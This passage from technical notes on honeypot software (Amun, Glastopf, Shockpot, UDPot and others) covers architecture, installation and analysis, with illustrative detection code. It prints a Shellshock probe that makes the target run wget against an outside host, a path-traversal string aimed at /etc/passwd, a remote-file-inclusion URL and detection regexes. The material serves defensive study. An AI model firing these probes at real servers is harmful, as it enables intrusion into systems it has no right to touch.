    3) a binary was already successfully downloaded
    4) and the host already successfully exploited the honeypot
5. http header filesize check
A lot of malware downloads use HTTP as transfer protocol, and one feature of an HTTP server is to store the file size in the HTTP header of the reply. If check http filesize is enabled, Amun will compare the size of the downloaded binary with the value received in the HTTP header. In case there is a mismatch, the downloaded file is discarded.

6. replace local ip with attacker ip (replace private IP addresses in the shellcode with the attacker's source IP)
Whenever the Shellcode Analyzer extracts a download URL from the payload of an exploit, any IP address found is checked against a list of local IP addresses (e.g. 192.168.0.0/24). If replace local ip is enabled, Amun will replace all those IP addresses with the one of the attacker who sent the exploit. Local IP addresses in shellcode occur whenever a host behind a Network Address Translation (NAT) server is infected.

7. submit modules
Contains the modules that are responsible for handling any downloaded binary. The default module that is loaded is the submitmd5 module, which simply stores any downloaded unique file to hard disc. Uniqueness is determined by the MD5 hash of the file.
Additional modules of this type allow the transmission of binaries to external services like CWSandbox.

8. log modules
Modules that perform certain logging functionality. In most cases these modules send information to external intrusion detection systems.

9. vuln modules
This list contains all the vulnerability modules that should be loaded at the startup of Amun.
Modules listening on the same port answer requests in the order in which they are configured in the file.
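Added illustration (not Amun's own code) of three of the download-handling settings above: replace local ip, check http filesize and the submitmd5 store. The local networks, URLs, attacker address and the sample HTTP reply are constructed for the example.

```python
import hashlib
import ipaddress
from urllib.parse import urlsplit, urlunsplit

# Address ranges treated as "local" for replace_local_ip; constructed for the
# example (Amun reads its own list from conf/amun.conf).
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_local_address(host):
    """True for an IP literal inside one of LOCAL_NETS; hostnames are left alone."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in LOCAL_NETS)


def rewrite_download_url(url, attacker_ip, replace_local_ip=True):
    """replace_local_ip: a download URL pointing at a private address (the
    infected host sits behind NAT) is rewritten to the attacker's own IP,
    keeping scheme, port, userinfo, path and query intact."""
    parts = urlsplit(url)
    host = parts.hostname
    if not replace_local_ip or host is None or not is_local_address(host):
        return url
    userinfo = parts.netloc.rsplit("@", 1)[0] + "@" if "@" in parts.netloc else ""
    hostport = attacker_ip if parts.port is None else "%s:%d" % (attacker_ip, parts.port)
    return urlunsplit((parts.scheme, userinfo + hostport, parts.path, parts.query, parts.fragment))


def accept_http_download(headers, body, check_http_filesize=True):
    """check_http_filesize: discard a body whose length disagrees with the
    Content-Length the server announced. Returns (accepted, reason)."""
    if not check_http_filesize:
        return True, "size check disabled"
    lowered = {k.lower(): v for k, v in headers.items()}
    announced = lowered.get("content-length")
    if announced is None:
        return True, "no Content-Length header to compare against"
    if int(announced) != len(body):
        return False, "size mismatch: header says %s, received %d" % (announced, len(body))
    return True, "size matches Content-Length"


def submit_md5(body, store):
    """submitmd5 behaviour: the MD5 hex digest names the file, so a binary
    seen before is not stored twice. Returns (name, is_new)."""
    name = hashlib.md5(body).hexdigest()
    if name in store:
        return name, False
    store[name] = body
    return name, True


if __name__ == "__main__":
    # Constructed values: a NAT'd download URL and a truncated HTTP reply.
    print(rewrite_download_url("http://192.168.0.5:8080/x.exe", "203.0.113.7"))
    print(accept_http_download({"Content-Length": "10"}, b"MZ\x90\x00"))
```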

3. Request Handler

The Request Handler is responsible for all incoming and outgoing network traffic of the honeypot.
For every connection request that reaches the Amun Kernel, a Request Handler is created that handles the connection until it is closed. The Request Handler maintains the list of loaded vulnerability modules and delegates the incoming traffic to those modules that are registered for the current port.
Consider a connection coming in on port 445:

1. If it is a new connection, the Request Handler loads all vulnerability modules for port 445 by checking the vulnerability array at the key 445.
2. In the next step the incoming traffic is distributed to each of the modules returned by the previous step.
3. Each of the vulnerability modules checks if the incoming traffic matches the service that is emulated and returns whether it accepts or rejects the connection.
4. As a result, the list of emulated vulnerabilities for a connection is thinned out with each incoming request of the attacker.
    1) In the worst case none of the registered modules matches the attack pattern and the connection is closed.
    2) Otherwise, there is exactly one module left, which successfully emulates all needed steps performed by the attacker and receives the final payload containing the download information of the malware.
// Note that incoming network packets can be distributed to all registered vulnerability modules, but a reply can only be sent by one. In the best case there should only be one module left to reply after the first packet is received; however, if there are more left, the reply of the first module in the list is chosen.

5. Connections that for some reason do not match any of the vulnerability modules, or do not fit an emulated service at any stage, create a log entry in the Amun Request Handler log. This log contains information about the attacking host and the request that was sent. This information helps to update existing vulnerability modules or create new ones.

6. The Request Handler also receives the results of the vulnerability module that successfully emulated a service and obtained the exploit payload from the attacker. This payload is passed on to the Shellcode Analyzer to detect any known shellcode. The results of the Shellcode Analyzer are again returned to the Request Handler; thus the Request Handler is the crucial point for any attack.

4. Vulnerability Modules

The vulnerability modules make up the emulated services which lure autonomous spreading malware. Each module represents a different service, for example an FTP server. The services are emulated only to the degree that is needed to trigger a certain exploit. That means the emulated services cannot be used regularly, i.e. they do not offer the full functionality of the original service.
From this point of view Amun is a vulnerability-oriented honeypot rather than a low-interaction or high-interaction honeypot.
Vulnerabilities are realized as finite state machines. They usually consist of several stages that lead through the emulated service.

That means each incoming network packet of an attacker is matched against the next state of the finite state machine. If it matches, the state of the vulnerability module switches to the next stage; otherwise the vulnerability module rejects the incoming request. That way Amun assures that only requests that lead to the exploit of the emulated service are accepted. All data that leads to an undefined state is logged by the Request Handler.
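The port-keyed vulnerability array, the Request Handler's per-packet thinning of candidate modules and the finite-state-machine modules of sections 1, 3 and 4 above, as one added Python illustration (not Amun's own code). Module names, stage patterns and the packets are constructed stand-ins, and the Shellcode Analyzer is reduced to a download-URL extractor.

```python
import re
from collections import defaultdict


class VulnModule:
    """A vulnerability module as a finite state machine: one expected pattern
    per stage, plus the canned reply returned once that stage is reached."""

    def __init__(self, name, ports, stages, replies):
        self.name = name
        self.ports = ports
        self.stages = [re.compile(p) for p in stages]
        self.replies = replies

    def spawn(self):
        return VulnSession(self)  # fresh per-connection state


class VulnSession:
    def __init__(self, module):
        self.module = module
        self.stage = 0

    def incoming(self, data):
        """Match data against the next stage; return (accepted, payload) where
        payload is set only when the final stage, the exploit itself, arrived."""
        if self.stage >= len(self.module.stages):
            return False, None
        if self.module.stages[self.stage].search(data) is None:
            return False, None  # undefined state: this module drops out
        self.stage += 1
        return True, (data if self.stage == len(self.module.stages) else None)

    def reply(self):
        return self.module.replies[self.stage - 1]


def build_vuln_array(modules):
    """Amun Kernel start-up: index every module under each port it serves."""
    vuln_array = defaultdict(list)
    for module in modules:
        for port in module.ports:
            vuln_array[port].append(module)
    return dict(vuln_array)


URL_RE = re.compile(r"\b(?:https?|ftp|tftp)://[^\s'\"<>]+")


def extract_download_urls(payload):
    """Stand-in for the Shellcode Analyzer: pull download URLs out of the
    captured payload (Amun itself also decodes known decoder loops first)."""
    return URL_RE.findall(payload)


class RequestHandler:
    """One handler per connection; shrinks the list of matching modules per packet."""

    def __init__(self, vuln_array, port, attacker_ip, log):
        self.port, self.attacker_ip, self.log = port, attacker_ip, log
        self.candidates = [m.spawn() for m in vuln_array.get(port, [])]

    def handle(self, data):
        """Return (reply, download_urls); reply is None when nothing matched,
        which Amun logs and answers by closing the connection."""
        survivors, payload = [], None
        for session in self.candidates:
            accepted, final = session.incoming(data)
            if accepted:
                survivors.append(session)
                if final is not None and payload is None:
                    payload = (session.module.name, final)
        self.candidates = survivors
        if not survivors:
            self.log.append("%s:%d unmatched %r" % (self.attacker_ip, self.port, data))
            return None, []
        urls = extract_download_urls(payload[1]) if payload else []
        if payload:
            self.log.append("%s:%d payload via %s -> %s" % (self.attacker_ip, self.port, payload[0], urls))
        return survivors[0].reply(), urls  # only the first survivor answers


# Constructed stand-ins: the stage patterns are plain words, not real SMB/NetDDE bytes.
MODULES = [
    VulnModule("vuln-alpha", [445], [r"^NEGOTIATE", r"^SESSION_SETUP", r"^EXPLOIT"],
               ["NEGOTIATE_OK", "SESSION_OK", ""]),
    VulnModule("vuln-beta", [445, 139], [r"^NEGOTIATE", r"^TREE_CONNECT"],
               ["NEGOTIATE_OK", "TREE_OK"]),
    VulnModule("vuln-gamma", [139], [r"^NETDDE"], ["NETDDE_OK"]),
]


def run_connection(port, attacker_ip, packets, modules=MODULES):
    """Drive one attacker connection through a handler; return (urls, log)."""
    log, urls = [], []
    handler = RequestHandler(build_vuln_array(modules), port, attacker_ip, log)
    for data in packets:
        reply, found = handler.handle(data)
        urls.extend(found)
        if reply is None:
            break
    return urls, log
```

Calling run_connection(445, "198.51.100.9", ["NEGOTIATE", "SESSION_SETUP", "EXPLOIT ... http://203.0.113.5/x.exe"]) walks vuln-alpha through all three stages and yields the extracted URL plus one log line.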

5. Shellcode Analyzer

In case a vulnerability module successfully emulated a service to the point where the attacker sends exploit code, all incoming data is recorded and finally transferred to the Shellcode Analyzer. The Shellcode Analyzer is the backbone of Amun, as it is responsible for shellcode recognition and decoding. Shellcode is recognized using several regular expressions that match known parts of shellcode. In most cases this is the decoder part, a small loop that decodes the obfuscated shellcode back to its original form.

6. Download Modules

As described in the previous section, the Shellcode Analyzer extracts the commands from the shellcode. These commands end up being some kind of download method to get the actual malware, e.g. the worm binary. As the goal of Amun is to capture autonomously spreading malware, we want to get hold of any advertised binary file, thus we need Amun to be able to handle different kinds of download methods. For each download method we can provide a module that is loaded upon the start of the honeypot. Amun currently provides four basic download modules, namely:

1. HTTP
2. FTP
3. TFTP
4. direct download

7. Submission Modules

Once a file has been downloaded using any of the above-mentioned download modules, it needs to be processed further. That means it can be stored to hard disc, for example, or sent to a remote service. In the default configuration Amun only loads the submit-md5 module. This module stores each downloaded binary to a certain folder on the hard drive. As a filename it uses the MD5 hash of the content of the file.

Relevant Link:

https://ub-madoc.bib.uni-mannheim.de/2595/1/amunhoneypot2.pdf
http://subs.emis.de/LNI/Proceedings/Proceedings170/177.pdf
https://sourceforge.net/projects/amunhoney/

 

6. Glastopf web honeypot

Glastopf is a honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications.
Glastopf's core strategy is not to simulate a high-interaction web system 100%. It targets automated vulnerability scanning and exploitation tools: by categorising exploitation methods and returning a plausible result for a whole class of exploitation method, it achieves its goal with low interaction.

0x1: Overall architecture diagram

0x2: Remote File Inclusion

This attack principle is very easy: Include the malicious file in vulnerable code in the web application and have it run on the compromised web server. Most of the time the attacker expects some kind of feedback from his code if the injection has been successful. And that's where we get involved.

0x3: Local File Inclusion

Another handled attack type is Local File Inclusion. In this type of approach, the attacker tries to use a vulnerability to obtain security critical system information or to execute previously injected code. If the attacker tries to include system files like passwd or shadow, Glastopf replies with a dynamically generated file, similar to the requested one, to provoke and encourage further attacks. If Glastopf is unable to categorize the attack, it is merely logged in our database. An exception are requests on the web server root folder and index.* requests.

0x4: General approach

1. Vulnerability type emulation instead of vulnerability emulation. Once a vulnerability type is emulated, Glastopf can handle unknown attacks of the same type. While implementation may be slower and more complicated, we remain ahead of the attackers until they come up with a new method or discover a new flaw in our implementation.

2. Modular design to add new logging capabilities or attack type handlers. Various database capabilities are already in place. HPFeeds logging is supported for centralized data collection.

3. Popular attack type emulation is already in place: Remote File Inclusion via a built-in PHP sandbox, Local File Inclusion providing files from a virtual file system and HTML injection via POST requests.

4. Adversaries usually use search engines and specially crafted search requests to find their victims. In order to attract them, Glastopf provides those keywords (AKA "dorks") and additionally extracts them from requests, extending its attack surface automatically. As a result, the honeypot gets more and more attractive with each new attack attempted on it.

5. Make the SQL injection emulator public, provide IP profiling for crawler recognition and intelligent dork selection.
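An added example (not Glastopf's own code) of the "vulnerability type emulation" approach above: an incoming request is classified as RFI, LFI, index or unknown from its parameters, LFI attempts are answered from a virtual file system, and everything else is only logged. The request lines and the virtual file contents are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A parameter value that is itself a remote URL is the RFI pattern; one that
# walks up with ../ or reaches straight into /etc or /proc is the LFI pattern.
RFI_RE = re.compile(r"^(?:https?|ftp)://", re.I)
LFI_RE = re.compile(r"\.\./|^/?(?:etc|proc)/", re.I)

# Virtual file system served to LFI attempts instead of the real files;
# the contents are constructed stand-ins.
VIRTUAL_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/bin/sh\n",
    "/etc/hosts": "127.0.0.1 localhost\n",
}


def normalise_path(value):
    """Collapse ../ traversal and a trailing null byte so that
    ../../../etc/passwd%00 and /etc/passwd resolve to the same key."""
    value = value.split("\x00", 1)[0].replace("\\", "/")
    parts = []
    for segment in value.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if parts:
                parts.pop()
            continue
        parts.append(segment)
    return "/" + "/".join(parts)


def classify(request_line):
    """Classify one HTTP request line by attack type and return the handler
    name, the offending parameter, the normalised value and the body the
    honeypot would answer with. Unknown requests get no body and are only logged."""
    _method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if RFI_RE.match(value):
            # Glastopf would fetch the file and run it in its PHP sandbox;
            # here the URL is only recorded and a placeholder body returned.
            return {"type": "rfi", "param": name, "value": value,
                    "response": "<!-- sandbox output placeholder -->"}
        if LFI_RE.search(value):
            path = normalise_path(value)
            return {"type": "lfi", "param": name, "value": path,
                    "response": VIRTUAL_FS.get(path, "")}
    if url.path in ("", "/") or url.path.startswith("/index."):
        return {"type": "index", "param": None, "value": url.path,
                "response": "<html><body>It works</body></html>"}
    return {"type": "unknown", "param": None, "value": target, "response": ""}


if __name__ == "__main__":
    for line in ("GET /index.php?page=http://203.0.113.9/inc.txt HTTP/1.1",
                 "GET /view.php?file=../../../etc/passwd%00 HTTP/1.1",
                 "GET / HTTP/1.1"):
        print(classify(line)["type"], line)
```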

0x5: INSTALL

1. Prerequisites

sudo apt-get update
sudo apt-get -y install python2.7 python-openssl python-gevent libevent-dev python2.7-dev build-essential make
sudo apt-get -y install python-chardet python-requests python-sqlalchemy python-lxml
sudo apt-get -y install python-beautifulsoup mongodb python-pip python-dev python-setuptools
sudo apt-get -y install g++ git php5 php5-dev liblapack-dev gfortran libmysqlclient-dev
sudo apt-get -y install libxml2-dev libxslt-dev
sudo pip install --upgrade distribute

2. Install and configure the PHP sandbox

cd /opt
sudo git clone git://github.com/mushorg/BFR.git
cd BFR
sudo phpize
sudo ./configure --enable-bfr
sudo make && sudo make install

Open the php.ini file and add bfr.so according to the build output:

vim /etc/php5/cli/php.ini
zend_extension = /usr/lib/php5/20121212/bfr.so

3. Install glastopf

// If you hit: NameError: name 'sys_platform' is not defined
rm -rf /usr/local/lib/python2.7/dist-packages/distribute-0.7.3-py2.7.egg-info/
rm -rf /usr/local/lib/python2.7/dist-packages/setuptools*

// If you hit: E: Unable to locate package python-logstash
pip install python-logstash

You may need to install distribute manually:
wget https://pypi.python.org/packages/source/d/distribute/distribute-0.6.35.tar.gz
tar -xzvf distribute-0.6.35.tar.gz
cd distribute-0.6.35
python setup.py install

// Python libraries found missing during installation
pip install MarkupSafe

// If sudo pip install glastopf fails
cd /opt
sudo git clone https://github.com/mushorg/glastopf.git
cd glastopf
sudo python setup.py install

4. Configuration

cd /opt
sudo mkdir myhoneypot
cd myhoneypot
sudo glastopf-runner

A new default glastopf.cfg has been created in myhoneypot, which can be customized as required.

vim glastopf.cfg
[hpfeed]
enabled = false

db/glastopf.db holds all raw data of the web interactions; it is a local SQLite file.

Relevant Link:

http://glastopf.org/
http://honeynet.org/papers/KYT_glastopf
http://honeynet.org/sites/default/files/files/KYT-Glastopf-Final_v1.pdf
https://github.com/mushorg/BFR
https://github.com/mushorg/glastopf

 

7. Wordpot

Wordpot is a WordPress honeypot which detects probes for plugins, themes, timthumb and other common files used to fingerprint a WordPress installation.

Relevant Link:

https://github.com/gbrindisi/wordpot

 

8. Conpot SCADA/ICS honeypot

Conpot is an ICS honeypot with the goal of collecting intelligence about the motives and methods of adversaries targeting industrial control systems.

Relevant Link:

https://www.honeynet.org/node/1047
https://github.com/mushorg/conpot
https://www.honeynet.org/taxonomy/term/304

 

9. phoneyc 

PhoneyC is a virtual client honeypot, meaning it is not a real application but rather an emulated client. By using dynamic analysis, PhoneyC is able to remove the obfuscation from many malicious pages. Furthermore, PhoneyC emulates specific vulnerabilities to pinpoint the attack vector. PhoneyC is a modular framework that enables the study of malicious HTTP pages and understands modern vulnerabilities and attacker techniques.

Relevant Link:

https://github.com/honeynet/phoneyc
https://code.google.com/archive/p/phoneyc/
http://citeseer.ist.psu.edu/viewdoc/summary;jsessionid=E30296F5A6B4C85ABBB46C3429974791?doi=10.1.1.148.5317
https://www.usenix.org/legacy/event/leet09/tech/full_papers/nazario/nazario.pdf
https://honeynet.org/project/PhoneyC

 

10. shockpot

Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271.

0x1: Installation

git clone https://github.com/threatstream/shockpot.git
cd shockpot
apt-get install python-virtualenv
virtualenv env
. env/bin/activate
pip install -r requirements.txt 
// Download the main bottle framework file
wget https://github.com/bottlepy/bottle/raw/master/bottle.py

0x2: Configuration

vim shockpot.conf
[server]
host = 0.0.0.0
port = 8080

[headers]
server = Apache/2.0.55 (Debian) PHP/5.1.2-1+b1 mod_ssl/2.0.55 OpenSSL/0.9.8b

[hpfeeds]
enabled = false
host = 127.0.0.1
port = 10000
identity = shockpot
secret = secret
channel = shockpot.events
only_exploits = True

[fetch_public_ip]
enabled = True
urls = ["http://www.telize.com/ip", "http://queryip.net/ip/", "http://ifconfig.me/ip"]

# put any variables in here that you want to render in your template.html. 
[template]
title = It Works!

0x3: Running

python shockpot.py

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1 
Host: help.tenpay.com 
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive
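As an added example (Python 3, my own code, not Shockpot's; Shockpot's actual matching rule may differ), the detection a honeypot like this performs on a request such as the one above: parse the raw request, look for the Shellshock function-definition pattern in any header, and record the trailing command in the event instead of executing it. The sample request is constructed after the probe shown above, with a placeholder host.

```python
import re

# A Shellshock probe carries "() {" followed by a trailing command in a header
# (or query) that a CGI handler exports as an environment variable. The
# pattern below is my own check; only the command text is recorded.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request_line, {lower-case header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def find_shellshock(raw):
    """Return [(location, command)] for every Shellshock pattern in the request."""
    request_line, headers = parse_request(raw)
    hits = []
    for name, value in list(headers.items()) + [("request-line", request_line)]:
        m = SHELLSHOCK_RE.search(value)
        if m:
            hits.append((name, m.group("cmd").strip()))
    return hits


def to_event(raw, src_ip):
    """Build the log record a honeypot would emit; the payload is logged, never run."""
    request_line, headers = parse_request(raw)
    hits = find_shellshock(raw)
    return {
        "src_ip": src_ip,
        "request": request_line,
        "user_agent": headers.get("user-agent", ""),
        "is_exploit": bool(hits),
        "payloads": [cmd for _, cmd in hits],
    }


# Constructed sample modelled on the probe shown above (not captured traffic).
SAMPLE = (
    "GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1\r\n"
    "Host: help.example.com\r\n"
    "User-Agent: () { :;}; /usr/bin/wget http://attacker.invalid/remember_client_ip.php\r\n"
    "Accept: */*\r\n\r\n"
)
```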

Relevant Link:

http://blog.csdn.net/jiayanhui2877/article/details/39584003
http://blog.csdn.net/huithe/article/details/8087645
https://pypi.python.org/pypi/bottle/0.12.9
https://github.com/bottlepy/bottle
https://github.com/threatstream/shockpot

 

11. MHN(Modern Honey Network)

From secure deployment to the aggregation of thousands of events, MHN provides enterprise-grade management of the most current open source honeypot software. MHN is completely free open source software which supports external and internal honeypot deployments at a large and distributed scale.

Relevant Link:

http://drops.wooyun.org/papers/5968
http://threatstream.github.io/mhn/

 

12. Database Honeypots

Relevant Link:

1. Elastic honey - A Simple Elasticsearch Honeypot
https://github.com/jordan-wright/elastichoney

2. MysqlPot - A MySQL honeypot
https://github.com/schmalle/MysqlPot

3. NoSQLpot - The NoSQL Honeypot Framework.
https://github.com/torque59/nosqlpot

4. ESPot - ElasticSearch Honeypot
https://github.com/mycert/ESPot

 

13. awesome-honeypots

https://github.com/paralax/awesome-honeypots

 

14. Honey Drive

HoneyDrive is a Linux honeypot distribution, shipped as a virtual appliance (OVA) built on Xubuntu 12.04.4. It contains 10 pre-installed and pre-configured honeypot packages, such as:

1. Kippo SSH honeypot
2. Dionaea
3. Amun malware honeypots
4. Honeyd low-interaction honeypot
5. Glastopf web honeypot
6. Wordpot
7. Conpot SCADA/ICS honeypot
8. Thug
9. PhoneyC honeyclients, etc.

The system also ships scripts and tools to analyse the data and present it visually, such as Kippo-Graph, Honeyd-Viz, DionaeaFR and the ELK stack.

0x1: Features

1. Based on the Xubuntu 12.04.4 LTS virtual appliance
2. LAMP pre-installed (Apache 2, MySQL 5), plus other management tools such as phpMyAdmin
3. Kippo SSH honeypot, plus Kippo-Graph, Kippo-Malware, Kippo2MySQL and other scripts
4. Dionaea honeypot, with DionaeaFR and scripts
5. Amun honeypot and scripts
6. Glastopf web honeypot and Wordpot WordPress honeypot
7. Conpot SCADA/ICS honeypot
8. Honeyd low-interaction honeypot, and more
// Forensics and analysis tools, network monitoring, PDF analysis and so on, such as:
1. ntop
2. p0f
3. EtherApe
4. nmap
5. DFF
6. Wireshark
7. Recon-ng
8. ClamAV
9. ettercap
10. MASTIFF
11. Automater
12. UPX
13. pdftk
14. Flasm
15. Yara
16. Viper
17. pdf-parser
18. Pyew
19. Radare2
20. dex2jar, etc.

Relevant Link:

http://bruteforce.gr/honeydrive
http://www.freebuf.com/tools/40865.html

 

15. Dockpot

Dockpot is a high interaction SSH honeypot based on Docker. It's basically a NAT device that has the ability to act as an SSH proxy between the attacker and the honeypot (a Docker container in this case) and logs the attacker's activities. It creates a new Docker container for the first connection it gets, NATs the SSH connections to it, and destroys the container when the number of connections to it drops to zero.

0x1: Install

apt-get install docker
curl -sSL https://get.docker.com/ > installdocker.sh
sh ./installdocker.sh

git clone https://github.com/aabed/dockpot.git
cd dockpot
./honsshctrl.sh START

Relevant Link:

https://github.com/aabed/dockpot  

 

16. SSDP Honeypot

16. How we can use a honeypot system for intrusion analysis

I think there are several points in honeypot research that are worth going into in depth:

1) How a honeypot can offer better interactivity, and whether to consider tapping a real, original system from the side to extract the data we need, i.e. a high-interaction honeypot that relies on a real system

2) Emulating services entirely inside a virtual machine and building a completely virtual environment. In this case security is the most controllable, but it requires strong support from virtualisation techniques: virtual execution of shellcode, of commands, of system calls and even of CPU instructions. Many open-source projects are already working on this, and many x86 virtual sandboxes offer good emulation features

3) How to solidify the adversarial experience of security staff into data modelling. While capturing as much intrusion-trace data as possible, another important question is how to model and analyse these data along multiple dimensions. Data by itself has no meaning; only once we security people give it meaning and recombine it along several dimensions does it reveal, as patterns and trends, what lies behind it. This is the most important part of intrusion analysis and of countering attackers

4) Combining distributed honeypot technology with cloud computing and big data. In the cloud model the basic conditions for deploying distributed honeypots are already naturally met: security staff do not need to set up a dedicated honeypot system, because the cloud platform itself can serve as a source of intrusion and attack-trace data, i.e. big-data analysis. What we have to do is analyse these data more effectively. That still needs a combination of theory and practice: analysis models built on the security staff's experience and supported by the corresponding theory

The following comes from http://www.keyfocus.net/; I find their analysis dimensions quite inspiring

http://tech.sina.com.cn/s/2008-09-01/2301789129.shtml

EVENT
1. start time: time the activity started
2. end time: time the activity stopped
3. event ID: event ID
4. TYPE: connection type
5. DESCRIPTION: detailed description of the event
6. SEVERITY: severity of the event

VISITOR
1. IP: intruder's IP
2. PORT: port used by the intruder
3. DOMAIN: intruder's host name

SENSOR
1. IP: IP of the sensor owner
2. PORT: sensor port that was attacked
3. BOUND: IP the sensor is bound to
4. PROTOCOL: protocol type
5. ACTION: action the sensor took on this event
6. SIM SERVER: the simple (preset) server banner

DETAILS
1. CLOSED BY: which side finally closed the connection
2. Limit Exceeded: description of traffic that exceeded the limit
3. RECEIVED: data sent by the intruder and received by the sensor
4. RESPONSE: data sent by the sensor and received by the intruder
5. "EXPAND" button: expand (once expanded, several display formats can be chosen in the 'FORMAT' field)
6. "NEXT" button: details of the event with the next ID
7. "PREVIOUS" button: details of the event with the previous ID

Zhuge Jianwei's research papers also mention many inspiring analysis dimensions

Threat data analysis methods

1. The most basic threat data analysis mechanism is empirical analysis, i.e. statistically aggregating the data collected in experiments to reveal the basic statistical characteristics of security threats, so as to better understand the "attack strategies" and "tools" on the Internet

2. Visual analysis techniques go further and present the security threat data captured by honeypots as 2D graphics and 3D animations, showing the threat data to security researchers in a very intuitive way so that they quickly grasp the overall situation of the captured threats and spot the anomalous events it may contain
(I think this is what DionaeaFR aims at)

3. More advanced threat data analysis methods can explain the root causes behind the captured data. PCA (principal component analysis) has been applied to the data of the Leurré.com distributed honeypot system to extract latent "attack behaviour clusters" and perform "attribution analysis"

4. Clustering based on "attack time-sequence similarity" discovers common attack patterns in honeynet data

5. "Correlation analysis" has been applied: with the support of a security knowledge base, this method can identify "attack plans" in the security threat data captured by the honeynet and reconstruct the attack process scenarios, helping security researchers better discover and understand the "attack scenarios" contained in the captured data
(The security knowledge base here is, I think, a way of solidifying the security engineers' intrusion-analysis experience, turning it into patterns in something like regular-expression code for better pattern matching)
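The "attack time-sequence similarity" clustering of method 4, as an added Python 3 example over records shaped like the EVENT/VISITOR/SENSOR fields above. This is my own sketch, not code from the cited papers; the events, the similarity measure (difflib's ratio over per-visitor port sequences) and the threshold are all constructed for the example.

```python
from collections import defaultdict
from difflib import SequenceMatcher

# Constructed sensor events: (start_time, visitor_ip, sensor_port, protocol, action).
EVENTS = [
    (1, "203.0.113.10", 445, "TCP", "SIM SERVER"),
    (2, "203.0.113.10", 139, "TCP", "SIM SERVER"),
    (3, "203.0.113.10", 3389, "TCP", "CLOSE"),
    (1, "203.0.113.20", 445, "TCP", "SIM SERVER"),
    (2, "203.0.113.20", 139, "TCP", "SIM SERVER"),
    (3, "203.0.113.20", 3389, "TCP", "CLOSE"),
    (1, "203.0.113.30", 22, "TCP", "SIM SERVER"),
    (5, "203.0.113.30", 22, "TCP", "SIM SERVER"),
]


def attack_sequences(events):
    """Per visitor, the time-ordered sequence of (port, protocol) it touched."""
    per_visitor = defaultdict(list)
    for _, ip, port, proto, _ in sorted(events):
        per_visitor[ip].append((port, proto))
    return dict(per_visitor)


def similarity(a, b):
    """Sequence similarity in [0, 1]; 1.0 means the same ports in the same order."""
    return SequenceMatcher(None, a, b).ratio()


def cluster_sequences(seqs, threshold=0.8):
    """Greedy clustering: a visitor joins the first cluster whose representative
    sequence is at least `threshold` similar, otherwise it founds a new cluster.
    Returns [(representative_sequence, [visitor ips])]; a large cluster is a
    recurring attack pattern, a singleton is worth a closer look."""
    clusters = []
    for ip, seq in seqs.items():
        for rep, members in clusters:
            if similarity(rep, seq) >= threshold:
                members.append(ip)
                break
        else:
            clusters.append((seq, [ip]))
    return clusters
```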

 

17. Detecting Honeypots (anti-detection: honeypot detection techniques)

Although honeypots are a great resource for investigating adversaries or automatic exploitation via worms, the amount of information we can learn depends on how realistic the honeypots are. If an adversary breaks into a machine and immediately notices that she broke into a honeypot, her reaction might be to remove all evidence and leave the machine alone. On the other hand, if the fact that she broke into a honeypot remains undetected, she could use it to store attack tools and launch further attacks on other systems. This makes it very important to provide realistic-looking honeypots. For low-interaction honeypots, it is important to deceive network scanning tools, and for high-interaction honeypots, the whole operating system environment has to look very real. This is not a problem for a physical high-interaction honeypot, but for a system running under a virtual machine, it becomes more difficult to hide its nature.

0x1: Detecting Low-Interaction Honeypots

0x2: Detecting High-Interaction Honeypots

0x3: Detecting Rootkits

Relevant Link:

http://books.gigatux.nl/mirror/honeypot/final/ch09lev1sec1.html
https://github.com/a0rtega/pafish

 

18. DNS Honeypot

0x1: UDPot

git clone https://github.com/jekil/UDPot.git
cd UDPot
pip install -r requirements.txt
pip install twisted
python dns.py -h
usage: dns.py [-h] [-p DNS_PORT] [-c REQ_COUNT] [-t REQ_TIMEOUT] [-s] [-v] server

positional arguments:
  server: DNS server IP address

optional arguments:
  -h, --help: show this help message and exit
  -p DNS_PORT, --dns-port DNS_PORT: DNS honeypot port
  -c REQ_COUNT, --req-count REQ_COUNT: how many request to resolve
  -t REQ_TIMEOUT, --req-timeout REQ_TIMEOUT: how many request to resolve
  -s, --sql: database connection string
  -v, --verbose: print each request

You can run the DNS honeypot with the following command. You have to add the IP of the DNS server you use to resolve the first bunch of queries, so that the honeypot looks like an open resolver (in this example we use 8.8.8.8):

python dns.py 8.8.8.8 -v -p 53

Now your DNS honeypot is listening on port 5053, both UDP and TCP. If you want to bind it to port 53 you have to:

1. run it as root and use option -p which is really not recommended
2. add an iptables rule to redirect traffic from port 53 to port 5053

Example iptables rules to redirect traffic:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 53 -j REDIRECT --to-ports 5053
iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j REDIRECT --to-ports 5053

Some other arguments are optional:

-p is used to bind DNS honeypot service on a given port
-c how many requests should be resolved (sending a DNS reply) like a real open resolver
-t timeout to re-start resolving requests (sending a DNS reply) like a real open resolver
-s choose a SQL database (default SQLite)
-v verbose logging (prints each request)
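The "resolve the first few requests, then only log until the timeout passes" policy that -c and -t describe, as an added Python 3 example. This is my own model of that behaviour, not UDPot's code: tracking the quota per client IP and the refused-query report are my choices, and the clock is injectable so the policy can be exercised without waiting.

```python
import time


class OpenResolverPolicy:
    """Decide whether the honeypot forwards a query to the real resolver.

    The first req_count queries from a client are answered like an open
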